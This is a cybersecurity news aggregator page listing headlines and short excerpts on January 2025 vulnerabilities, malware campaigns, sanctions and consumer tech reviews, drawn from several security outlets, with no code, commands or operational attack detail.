Cybersecurity News

About This Website

Welcome to our cybersecurity news aggregator! This website gathers news articles from over 60 sources, providing you with a comprehensive and up-to-date overview of the latest happenings in the world of cybersecurity.

We utilize RSS feeds to collect the news, ensuring a streamlined and efficient process. This enables you to stay informed and access a wide variety of perspectives and insights in one convenient location.

Dive into the latest cybersecurity stories and explore the wealth of knowledge available, all in one place.

Cybersecurity News

GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs

Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user's Git credentials. "Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper," GMO Flatt Security researcher Ry0taK, who discovered the flaws

⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [27 January]

Welcome to your weekly cybersecurity scoop! Ever thought about how the same AI meant to protect our hospitals could also compromise them? This week, we’re breaking down the sophisticated world of AI-driven threats, key updates in regulations, and some urgent vulnerabilities in healthcare tech that need our attention. As we unpack these complex topics, we'll equip you with sharp insights to

Do We Really Need The OWASP NHI Top 10?

The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists. Non-human identity security represents an emerging

GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.

MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"

Meta's Llama Framework Flaw Exposes AI Systems to Remote Code Execution Risks

A high-severity security flaw has been disclosed in Meta's Llama large language model (LLM) framework that, if successfully exploited, could allow an attacker to execute arbitrary code on the llama-stack inference server. The vulnerability, tracked as CVE-2024-50050, has been assigned a CVSS score of 6.3 out of 10.0. Supply chain security firm Snyk, on the other hand, has assigned it a

RANsacked: Over 100 Security Flaws Found in LTE and 5G Network Implementations

A group of academics has disclosed details of over 100 security vulnerabilities impacting LTE and 5G implementations that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network. The 119 vulnerabilities, assigned 97 unique CVE identifiers, span seven LTE implementations – Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC,

2025 State of SaaS Backup and Recovery Report

The modern workplace has undergone a seismic transformation over recent years, with hybrid work becoming the norm and businesses rapidly adopting cloud-based Software-as-a-Service (SaaS) applications to facilitate it. SaaS applications like Microsoft 365 and Google Workspace have now become the backbone of business operations, enabling seamless collaboration and productivity. However, this

DoJ Indicts 5 Individuals for $866K North Korean IT Worker Scheme Violations

The U.S. Department of Justice (DoJ) on Thursday indicted two North Korean nationals, a Mexican national, and two of its own citizens for their alleged involvement in the ongoing fraudulent information technology (IT) worker scheme that seeks to generate revenue for the Democratic People's Republic of Korea (DPRK) in violation of international sanctions. The action targets Jin Sung-Il (진성일), Pak

Android's New Identity Check Feature Locks Device Settings Outside Trusted Locations

Google has launched a new feature called Identity Check for supported Android devices that locks sensitive settings behind biometric authentication when outside of trusted locations. "When you turn on Identity Check, your device will require explicit biometric authentication to access certain sensitive resources when you're outside of trusted locations," Google said in a post announcing the

CISA Adds Five-Year-Old jQuery XSS Flaw to Exploited Vulnerabilities List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched security flaw impacting the popular jQuery JavaScript library to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The medium-severity vulnerability is CVE-2020-11023 (CVSS score: 6.1/6.9), a nearly five-year-old cross-site scripting (XSS) bug that could be

Palo Alto Firewalls Found Vulnerable to Secure Boot Bypass and Firmware Exploits

An exhaustive evaluation of three firewall models from Palo Alto Networks has uncovered a host of known security flaws impacting the devices' firmware as well as misconfigured security features. "These weren't obscure, corner-case vulnerabilities," security vendor Eclypsium said in a report shared with The Hacker News. "Instead these were very well-known issues that we wouldn't expect to see

Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks

Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the infamous Lumma information stealer. "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at

New Research: The State of Web Exposure 2025

Are your websites leaking sensitive data? New research reveals that 45% of third-party apps access user info without proper authorization, and 53% of risk exposures in Retail are due to the excessive use of tracking tools. Learn how to uncover and mitigate these hidden threats and risks—download the full report here. New research by web exposure management specialist Reflectiz reveals several

Custom Backdoor Exploiting Magic Packet Vulnerability in Juniper Routers

Enterprise-grade Juniper Networks routers have become the target of a custom backdoor as part of a campaign dubbed J-magic. According to the Black Lotus Labs team at Lumen Technologies, the activity is so named for the fact that the backdoor continuously monitors for a "magic packet" sent by the threat actor in TCP traffic. "J-magic campaign marks the rare occasion of malware designed

Experts Find Shared Codebase Linking Morpheus and HellCat Ransomware Payloads

An analysis of HellCat and Morpheus ransomware operations has revealed that affiliates associated with the respective cybercrime entities are using identical code for their ransomware payloads. The findings come from SentinelOne, which analyzed artifacts uploaded to the VirusTotal malware scanning platform by the same submitter towards the end of December 2024. "These two payload samples are

How to Eliminate Identity-Based Threats

Despite significant investments in advanced technologies and employee training programs, credential and user-based attacks remain alarmingly prevalent, accounting for 50-80% of enterprise breaches[1],[2]. While identity-based attacks continue to dominate as the leading cause of security incidents, the common approach to identity security threats is still threat reduction, implementing layers of

SonicWall Urges Immediate Patch for Critical CVE-2025-23006 Flaw Amid Likely Exploitation

SonicWall is alerting customers of a critical security flaw impacting its Secure Mobile Access (SMA) 1000 Series appliances that it said has been likely exploited in the wild as a zero-day. The vulnerability, tracked as CVE-2025-23006, is rated 9.8 out of a maximum of 10.0 on the CVSS scoring system. "Pre-authentication deserialization of untrusted data vulnerability has been identified in the

QakBot-Linked BC Malware Adds Enhanced Remote Access and Data Gathering Features

Cybersecurity researchers have disclosed details of a new BackConnect (BC) malware that has been developed by threat actors linked to the infamous QakBot loader. "BackConnect is a common feature or module utilized by threat actors to maintain persistence and perform tasks," Walmart's Cyber Intelligence team told The Hacker News. "The BackConnect(s) in use were 'DarkVNC' alongside the IcedID

Cisco Fixes Critical Privilege Escalation Flaw in Meeting Management (CVSS 9.9)

Cisco has released software updates to address a critical security flaw impacting Meeting Management that could permit a remote, authenticated attacker to gain administrator privileges on susceptible instances. The vulnerability, tracked as CVE-2025-20156, carries a CVSS score of 9.9 out of 10.0. It has been described as a privilege escalation flaw in the REST API of Cisco Meeting Management. "This

Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity Review

The new Trump administration has terminated all memberships of advisory committees that report to the Department of Homeland Security (DHS). "In alignment with the Department of Homeland Security's (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory

TRIPLESTRENGTH Hits Cloud for Cryptojacking, On-Premises Systems for Ransomware

Google on Wednesday shed light on a financially motivated threat actor named TRIPLESTRENGTH for its opportunistic targeting of cloud environments for cryptojacking and on-premise ransomware attacks. "This actor engaged in a variety of threat activity, including cryptocurrency mining operations on hijacked cloud resources and ransomware activity," the tech giant's cloud division said in its 11th

Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS Botnet

Threat actors are exploiting an unspecified zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet called AIRASHI to carry out distributed denial-of-service (DDoS) attacks. According to QiAnXin XLab, the attacks have leveraged the security flaw since June 2024. Additional details about the shortcomings have been withheld to prevent further abuse. Some

Discover Hidden Browsing Threats: Free Risk Assessment for GenAI, Identity, Web, and SaaS Risks

As GenAI tools and SaaS platforms become a staple component in the employee toolkit, the risks associated with data exposure, identity vulnerabilities, and unmonitored browsing behavior have skyrocketed. Forward-thinking security teams are looking for security controls and strategies to address these risks, but they do not always know which risks to prioritize. In some cases, they might have

President Trump Pardons Silk Road Creator Ross Ulbricht After 11 Years in Prison

U.S. President Donald Trump on Tuesday granted a "full and unconditional pardon" to Ross Ulbricht, the creator of the infamous Silk Road drug marketplace, after spending more than 11 years behind bars. "I just called the mother of Ross William Ulbricht to let her know that in honor of her and the Libertarian Movement, which supported me so strongly, it was my pleasure to have just signed a full

PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack

A previously undocumented China-aligned advanced persistent threat (APT) group named PlushDaemon has been linked to a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023, according to new findings from ESET. "The attackers replaced the legitimate installer with one that also deployed the group's signature implant that we have named SlowStepper – a

Oracle Releases January 2025 Patch to Address 318 Flaws Across Major Products

Oracle is urging customers to apply its January 2025 Critical Patch Update (CPU) to address 318 new security vulnerabilities spanning its products and services. The most severe of the flaws is a bug in the Oracle Agile Product Lifecycle Management (PLM) Framework (CVE-2025-21556, CVSS score: 9.9) that could allow an attacker to seize control of susceptible instances. "Easily exploitable

Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices

Web infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated

Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers

Cybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc Botnet. The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh

13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks

A global network of about 13,000 hijacked MikroTik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices. The activity "take[s] advantage of misconfigured DNS records to pass email protection techniques," Infoblox security researcher David Brunsdon said in a technical report published last week. "This

Ex-CIA Analyst Pleads Guilty to Sharing Top-Secret Data with Unauthorized Parties

A former analyst working for the U.S. Central Intelligence Agency (CIA) pleaded guilty to transmitting top secret National Defense Information (NDI) to individuals who did not have the necessary authorization to receive it and attempted to cover up the activity. Asif William Rahman, 34, of Vienna, was an employee of the CIA since 2016 and had a Top Secret security clearance with access to

HackGATE: Setting New Standards for Visibility and Control in Penetration Testing Projects

Imagine receiving a penetration test report that leaves you with more questions than answers. Questions like, "Were all functionalities of the web app tested?" or "Were there any security issues that could have been identified during testing?" often go unresolved, raising concerns about the thoroughness of the security testing. This frustration is common among many security teams. Pentest

PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software Installers

Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing

CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits

The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to

Unsecured Tunneling Protocols Expose 4.2 Million Hosts, Including VPNs and Routers

New research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks. "Internet hosts that accept tunneling packets without verifying the sender's identity can be hijacked to perform anonymous attacks and provide access to their networks," Top10VPN said in a study, as part of a collaboration with KU Leuven professor

DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence Collection

The threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the

⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]

As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with

Product Walkthrough: How Satori Secures Sensitive Data From Production to AI

Every week seems to bring news of another data breach, and it’s no surprise why: securing sensitive data has become harder than ever. And it’s not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting

Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP

Cybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repositories that come with capabilities to steal data and even delete sensitive data from infected systems. The list of identified packages is below - @async-mutex/mutex, a typosquat of async-mute (npm) dexscreener, which masquerades as a library for accessing liquidity pool

TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025

Popular video-sharing social network TikTok has officially gone dark in the United States, as a federal ban on the app comes into effect on January 19, 2025. "We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable," the company said in a pop-up message. "We're working to restore our service in the U.S. as soon as possible

U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Salt Typhoon

The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. "People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent

Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation

Cybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. "These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker

Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation

Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks

How to Bring Zero Trust to Wi-Fi Security with a Cloud-based Captive Portal?

Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access,

New 'Sneaky 2FA' Phishing Kit Targets Microsoft 365 Accounts with 2FA Code Bypass

Cybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that's capable of targeting Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting

U.S. Sanctions North Korean IT Worker Network Supporting WMD Programs

The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People's Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions. "These

European Privacy Group Sues TikTok and AliExpress for Illicit Data Transfers to China

Austrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users' data to China. The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data

Russian Star Blizzard Targets WhatsApp Accounts in New Spear-Phishing Campaign

The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations

Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action

The digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle. Traditional trust management? Forget it. It's simply not built for today's fast-paced, hybrid environments. You need a

The $10 Cyber Threat Responsible for the Biggest Breaches of 2024

You can tell the story of the current state of stolen credential-based attacks in three numbers: Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon). Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester). Stolen credentials on criminal forums cost as

MasterCard DNS Error Went Unnoticed for Years

The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.

Chinese Innovations Spawn Wave of Toll Phishing Via SMS

Residents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid. Researchers say the surge in SMS spam coincides with new features added to a popular commercial phishing kit sold in China that makes it simple to set up convincing lures spoofing toll road operators in multiple U.S. states.

Microsoft: Happy 2025. Here’s 161 Security Updates

Microsoft today unleashed updates to plug a whopping 161 security vulnerabilities in Windows and related software, including three "zero-day" weaknesses that are already under active attack. Redmond's inaugural Patch Tuesday of 2025 bundles more fixes than the company has shipped in one go since 2017.

A Day in the Life of a Prolific Voice Phishing Crew

Besieged by scammers seeking to phish user accounts over the telephone, Apple and Google frequently caution that they will never reach out unbidden to users this way. However, new details about the internal operations of a prolific voice phishing gang show the group routinely abuses legitimate services at Apple and Google to force a variety of outbound communications to their users, including emails, automated phone calls and system-level messages sent to all signed-in devices.

U.S. Army Soldier Arrested in AT&T, Verizon Extortions

Federal authorities have arrested and indicted a 20-year-old U.S. Army soldier on suspicion of being Kiberphant0m, a cybercriminal who has been selling and leaking sensitive customer call records stolen earlier this year from AT&T and Verizon. As first reported by KrebsOnSecurity last month, the accused is a communications specialist who was recently stationed in South Korea.

Happy 15th Anniversary, KrebsOnSecurity!

KrebsOnSecurity.com turns 15 years old today! Maybe it's indelicate to celebrate the birthday of a cybercrime blog that mostly publishes bad news, but happily many of 2024's most engrossing security stories were about bad things happening to bad guys. It's also an occasion to note that despite my publishing fewer stories than ever this past year, we somehow managed to attract near record levels of readership (thank you!).

Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm

Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.

Read More
How to Lose a Fortune with Just One Bad Click
How to Lose a Fortune with Just One Bad Click

Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click "yes" to a Google prompt on his mobile device.

Read More
How Cryptocurrency Turns to Cash in Russian Banks
How Cryptocurrency Turns to Cash in Russian Banks

A financial firm registered in Canada has emerged as the payment processor for dozens of Russian cryptocurrency exchanges and websites hawking cybercrime services aimed at Russian-speaking customers, new research finds. Meanwhile, an investigation into the Vancouver street address used by this company shows it is home to dozens of foreign currency dealers, money transfer businesses, and cryptocurrency exchanges -- none of which are physically located there.

Read More
Patch Tuesday, December 2024 Edition
Patch Tuesday, December 2024 Edition

Microsoft today released updates to plug at least 70 security holes in Windows and Windows software, including one vulnerability that is already being exploited in active attacks. The zero-day seeing exploitation involves CVE-2024-49138, a security weakness in the Windows Common… Read More »

Read More
New VPN Backdoor
New VPN Backdoor

A newly discovered VPN backdoor uses some interesting tactics to avoid detection:

When threat actors use backdoor malware to gain access to a network, they want to make sure all their hard work can’t be leveraged by competing groups or detected by defenders. One countermeasure is to equip the backdoor with a passive agent that remains dormant until it receives what’s known in the business as a “magic packet.” On Thursday, researchers revealed that a never-before-seen backdoor that quietly took hold of dozens of enterprise VPNs running Juniper Network’s Junos OS has been doing just that...

Friday Squid Blogging: Beaked Whales Feed on Squid

A Travers’ beaked whale (Mesoplodon traversii) washed ashore in New Zealand, and scientists concluded that “the prevalence of squid remains [in its stomachs] suggests that these deep-sea cephalopods form a significant part of the whale’s diet, similar to other beaked whale species.”

Third Interdisciplinary Workshop on Reimagining Democracy (IWORD 2024)

Last month, Henry Farrell and I convened the Third Interdisciplinary Workshop on Reimagining Democracy (IWORD 2024) at Johns Hopkins University’s Bloomberg Center in Washington DC. This is a small, invitational workshop on the future of democracy. As with the previous two workshops, the goal was to bring together a diverse set of political scientists, law professors, philosophers, AI researchers and other industry practitioners, political activists, and creative types (including science fiction writers) to discuss how democracy might be reimagined in the current century...

AI Will Write Complex Laws

Artificial intelligence (AI) is writing law today. This has required no changes in legislative procedure or the rules of legislative bodies—all it takes is one legislator, or legislative assistant, to use generative AI in the process of drafting a bill.

In fact, the use of AI by legislators is only likely to become more prevalent. There are currently projects in the US House, US Senate, and legislatures around the world to trial the use of AI in various ways: searching databases, drafting text, summarizing meetings, performing policy research and analysis, and more. A Brazilian municipality ...

AI Mistakes Are Very Different from Human Mistakes

Humans make mistakes all the time. All of us do, every day, in tasks both new and routine. Some of our mistakes are minor and some are catastrophic. Mistakes can break trust with our friends, lose the confidence of our bosses, and sometimes be the difference between life and death.

Over the millennia, we have created security systems to deal with the sorts of mistakes humans commonly make. These days, casinos rotate their dealers regularly, because they make mistakes if they do the same task for too long. Hospital personnel write on limbs before surgery so that doctors operate on the correct body part, and they count surgical instruments to make sure none were left inside the body. From copyediting to double-entry bookkeeping to appellate courts, we humans have gotten really good at correcting human mistakes...

Biden Signs New Cybersecurity Order

President Biden has signed a new cybersecurity order. It has a bunch of provisions, most notably using the US government's procurement power to improve cybersecurity practices industry-wide.

Some details:

The core of the executive order is an array of mandates for protecting government networks based on lessons learned from recent major incidents­—namely, the security failures of federal contractors.

The order requires software vendors to submit proof that they follow secure development practices, building on a mandate that debuted in 2022 in response to ...

Friday Squid Blogging: Opioid Alternatives from Squid Research

Is there nothing that squid research can’t solve?

“If you’re working with an organism like squid that can edit genetic information way better than any other organism, then it makes sense that that might be useful for a therapeutic application like deadening pain,” he said.

[…]

Researchers hope to mimic how squid and octopus use RNA editing in nerve channels that interpret pain and use that knowledge to manipulate human cells.

Social Engineering to Disable iMessage Protections

I am always interested in new phishing tricks, and watching them spread across the ecosystem.

A few days ago I started getting phishing SMS messages with a new twist. They were standard messages about delayed packages or somesuch, with the goal of getting me to click on a link and enter some personal information into a website. But because they came from unknown phone numbers, the links did not work. So—this is the new bit—the messages said something like: “Please reply Y, then exit the text message, reopen the text message activation link, or copy the link to Safari browser to open it.”...

FBI Deletes PlugX Malware from Thousands of Computers

According to a DOJ press release, the FBI was able to delete the Chinese-used PlugX malware from “approximately 4,258 U.S.-based computers and networks.”

Details:

To retrieve information from and send commands to the hacked machines, the malware connects to a command-and-control server that is operated by the hacking group. According to the FBI, at least 45,000 IP addresses in the US had back-and-forths with the command-and-control server since September 2023.

It was that very server that allowed the FBI to finally kill this pesky bit of malicious software. First, they tapped the know-how of French intelligence agencies, which had ...

Phishing False Alarm

A very security-conscious company was hit with a (presumed) massive state-actor phishing attack with gift cards, and everyone rallied to combat it—until it turned out it was company management sending the gift cards.

Student Loan Breach Exposes 2.5M Records

2.5 million people were affected, in a breach that could spell more trouble down the line.

Watering Hole Attacks Push ScanBox Keylogger

Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.

Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms

Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.

Ransomware Attacks are on the Rise

Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.

Cybercriminals Are Selling Access to Chinese Surveillance Cameras

Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.

Twitter Whistleblower Complaint: The TL;DR Version

Twitter is blasted for security and privacy lapses by the company’s former head of security who alleges the social media giant’s actions amount to a national security risk.

Firewall Bug Under Active Attack Triggers CISA Warning

CISA is warning that Palo Alto Networks’ PAN-OS is under active attack and needs to be patched ASAP.

Fake Reservation Links Prey on Weary Travelers

Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.

iPhone Users Urged to Update to Patch 2 Zero-Days

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

Google Patches Chrome’s Fifth Zero-Day of the Year

An insufficient input validation flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.

Furious over the Pixel 4a update fiasco? You may be entitled to compensation

If Google's update ruined your phone's battery life, you can choose a battery replacement, a Google store credit, or a cash payment. Here's how.

Is this the iPhone SE 4? Leaked photos reveal major changes coming in 2025

Rumored to launch in April, the SE 4 sports a single camera, a notch, a USB-C port, and no more Home button, according to photos and a video shared by a known leaker.

You need this wireless charger with a built-in fan for your iPhone - here's why and how it works

Wireless chargers are known for their predisposition to generate heat during charging. The Torras PolarCircle solves this problem using science.

This 27-inch Asus smart monitor doubles as a Google TV for your office - and it impressed me

The Asus ZenScreen Smart Monitor will connect to just about any device you have - and can go from a TV to a gaming system to a work display.

This versatile HP laptop will satisfy business professionals and creatives alike

HP's EliteBook x360 1040 has an adaptable form factor with one of the best video conferencing experiences I've tested on a laptop.

Can Substack lure creators with its new $20 million program? Here's how it plans to do it

Substack has attracted thousands of independent writers, journalists, and creators over the last few years by allowing them to monetize their content through paid newsletters. It might be about to attract a lot more.

The Galaxy S25 Ultra S Pen is losing its Bluetooth superpowers - but Samsung has a pricey fix

While the Bluetooth-enabled S Pen doesn't come with the new phone, Samsung may be offering it separately for users who really want it.

My favorite bone conduction headphones for swimming just got a brilliant new feature

Bone conduction headsets let you stay aware while working out. The Nank Runner Diver2 Pro adds a new design element to take that idea even further.

How to remove Copilot from your Microsoft 365 plan

Copilot has muscled its way into Microsoft 365 with a price hike to boot. But you can remove the AI from Word and revert to the classic plan. Here's how.

Your Google Pixel 9 is getting a major audio upgrade - and it's coming for free

Bluetooth LE audio lets you listen to your Auracast-enabled hearing aids, headphones, speakers, and more.

72 hours later with Galaxy S25 Ultra - the AI hype is getting real for me

The lighter and thinner design, upgraded processor, and swath of Galaxy AI tools are top-notch, but has Samsung done enough to win you over?

The best NAS devices of 2025: Expert tested

We tested the top NAS storage devices that provide seamless storage solutions for personal and professional use.

Forget Galaxy S25: This is the Samsung phone I recommend to most people - and it's on sale

The Samsung Galaxy A35 isn't perfect, but its long battery life and OLED display make it a great phone for most. And it comes with a pair of free earbuds on Amazon.

Can you make an AirTag last 10 years? It took me seconds to do it

I have over a dozen AirTags in use, and my biggest problem is having to change the batteries every year or so. No more!

Samsung Galaxy S25 Ultra vs Google Pixel 9 Pro XL: We tested both, and here's the winner

Samsung's new flagship phone, the Galaxy S25 Ultra, has arrived. Here's how it stacks up with the Google Pixel 9 Pro XL.

The best power banks you can buy in 2025: Expert tested and reviewed

We tested the best portable power banks from Anker, Ugreen, Omnicharge, and more to help you find the ultimate solution for reviving your drained devices.

Could your job be at risk due to AI? Do this before it's too late

I have 78 million reasons why your career depends on what you do today. Here is everything you need to know.

Your customers don't want more AI - here's what to invest in instead

There's a disturbing trend in Big Tech. Don't make the same mistake.

My new favorite travel accessory is a 3-in-1 MagSafe charger that's smaller than a cookie

Anker's MagGo 3-1 wireless charger is an ultraportable device that's dethroned even my favorite travel charger.

Should you switch to Wi-Fi 7? Here's my advice after testing a next-gen router at home

The Asus RT-BE86U has a slew of security tools, letting you enjoy the next generation of high-speed internet safely. But should you upgrade to one?

TalkTalk Confirms Data Breach, Downplays Impact

UK telecoms firm TalkTalk has confirmed falling victim to a data breach after a threat actor boasted about hacking it.

The post TalkTalk Confirms Data Breach, Downplays Impact appeared first on SecurityWeek.

Industry Moves for the week of January 27, 2025 - SecurityWeek

Explore industry moves and significant changes in the industry for the week of January 27, 2025. Stay updated with the latest industry trends and shifts.

LTE, 5G Vulnerabilities Could Cut Entire Cities From Cellular Connectivity

Vulnerabilities in LTE/5G core infrastructure, some remotely exploitable, could lead to persistent denial-of-service to entire cities.

The post LTE, 5G Vulnerabilities Could Cut Entire Cities From Cellular Connectivity appeared first on SecurityWeek.

Cyber Insights 2025: Cybersecurity Regulatory Mayhem

Cybersecurity regulations are facing a tipping point. There are too many and they are too complex to manage – and it’s getting worse.

The post Cyber Insights 2025: Cybersecurity Regulatory Mayhem appeared first on SecurityWeek.

Endor Labs and Allies Launch Opengrep, Reviving True OSS for SAST

Opengrep is a new consortium-backed fork of Semgrep, intended to be and remain a true genuine OSS SAST tool.

The post Endor Labs and Allies Launch Opengrep, Reviving True OSS for SAST appeared first on SecurityWeek.

Building Automation Protocols Increasingly Targeted in OT Attacks: Report

Industrial automation protocols continue to be the most targeted in OT attacks, but building automation systems have been increasingly targeted.

The post Building Automation Protocols Increasingly Targeted in OT Attacks: Report appeared first on SecurityWeek.

Git Vulnerabilities Led to Credentials Exposure

Vulnerabilities in Git’s credential retrieval protocol could have allowed attackers to compromise user credentials.

